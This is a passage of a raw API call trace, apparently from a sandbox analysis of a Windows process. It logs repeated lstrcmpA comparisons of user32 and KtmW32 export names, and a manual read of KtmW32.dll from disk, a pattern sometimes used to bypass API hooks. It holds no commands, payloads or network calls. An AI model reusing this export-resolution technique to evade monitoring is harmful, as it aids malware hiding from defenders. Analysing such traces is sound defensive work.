(lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0133.157] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0133.157] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0133.157] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0133.157] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0133.157] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0133.157] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0133.157] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0133.157] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0133.157] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0133.157] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0133.157] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0133.157] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0133.157] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0133.157] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0133.157] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0133.157] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0133.157] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0133.157] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0133.157] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0133.157] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0133.158] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0133.158] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0133.158] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0133.158] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0133.158] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0133.158] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0133.158] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0133.158] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0133.158] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0133.158] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0133.158] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0133.158] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0133.158] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0133.158] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0133.158] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0133.158] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0133.158] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0133.159] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0133.159] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0133.159] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0133.159] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0133.159] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0133.159] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0133.159] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0133.159] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0133.160] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0133.161] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0133.162] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0133.163] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0133.163] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0133.163] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0133.163] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0133.163] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0133.163] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0133.163] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0133.556] GetProcessHeap () returned 0x460000 [0133.556] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x407f040 | out: hHeap=0x460000) returned 1 [0133.563] GetProcessHeap () returned 0x460000 [0133.563] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x479370 [0133.563] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0133.566] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0133.566] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0133.566] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0133.566] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0133.567] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0133.567] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0133.567] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0133.567] GetProcessHeap () returned 0x460000 [0133.567] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x5e00) returned 0x2cb5030 [0133.567] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0133.567] ReadFile (in: hFile=0x17c, lpBuffer=0x2cb5030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cb5030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0133.568] CloseHandle (hObject=0x17c) returned 1 [0133.568] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0133.568] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0133.568] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0133.568] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0133.568] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0133.568] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0133.568] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0133.568] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0133.568] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0133.568] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0133.569] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0133.569] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0133.569] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0133.569] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0133.569] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0133.569] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0133.569] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0133.569] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0133.569] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0133.569] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0133.569] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0133.569] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0133.569] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0133.569] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0133.569] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0133.569] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0133.569] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0133.569] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0133.569] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0133.570] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0133.570] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0133.570] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0133.570] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0133.570] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0133.570] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0133.570] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0133.570] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0133.570] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0133.570] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0133.570] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0133.570] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0133.570] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0133.571] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0133.571] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0133.571] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0133.571] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0133.571] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0133.571] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0133.571] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0133.571] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0133.571] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0133.571] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0133.572] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0133.572] lstrcmpA (lpString1="GetTransactionInformation", 